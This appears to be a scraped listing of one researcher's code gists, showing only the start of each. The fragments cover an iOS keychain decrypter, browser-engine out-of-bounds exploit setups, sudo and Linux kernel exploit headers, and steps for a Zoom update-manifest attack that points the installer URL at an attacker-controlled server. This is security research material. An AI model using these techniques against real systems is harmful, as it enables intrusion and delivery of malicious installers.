wbowling

#!/usr/bin/env python3

"""
Based on https://github.com/xperylabhub/ios_keychain_decrypter/blob/d7f3089067816cd2adc1ce910c9e1b927a356f37/keychain_decrypt.py#L113
"""

import plistlib
from bpylist import archiver, archive_types
import dataclasses
from Crypto.Cipher import AES

wbowling

#!/usr/bin/env python

from pwn import *
import requests
import string

"""
 * can add arbitrary html and pass the validator by adding a tag comment inside the <noscript> and close it
 * axios uses `input` directly and we can make it an object allowing full param control
 * cheerio needs a string, but axios tries to return the response as json. If you add `爀` and set the `responseEncoding` to `ascii` the json parsing fails and it returns text

wbowling

let oob, oob_rw, base;

function setup() {
  oob = new Uint8Array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]);
  oob_rw = new BigUint64Array([
    0x1111111122222222n,
    0x1111111122222222n,
    0x1111111122222222n,
  ]);

wbowling

#!/usr/bin/python

import os
import pty

from pwn import process, sleep, write, read, listen, p64

"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {

wbowling

test

wbowling

POC - https://youtu.be/zGSLBDo3N7s

1. Create a malicious update manifest with the Package-url pointing a server you control:

Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;

2. Upload the manifest it to a .zoom.us domain, one example is as the icon for a new https://marketplace.zoom.us/ app (there are client side checks to see if it's an image but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg

wbowling

// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;

var arr1 = [1.1];
var arr2 = [Date];

var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();

wbowling

let oob_arr = [1.1, 0x61616161, 3.3];

function getSetValue(i, v) {
  if (v) {
    oob_arr[i] = v;
  } else {
    return oob_arr[i];
  }
}

wbowling

// 4.4.0-116-generic #140-Ubuntu SMP
#define _GNU_SOURCE

#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>

wbowling

FROM ubuntu
RUN apt-get update -y && apt-get install -y gcc

RUN (                                                                           \
echo  '#define _GNU_SOURCE';                                                    \
echo  '#include <fcntl.h>';                                                     \
echo  '#include <stdio.h>';                                                     \
echo  '#include <unistd.h>';                                                    \
                                                                                \
echo  'char *getenv(const char *__name) {';                                     \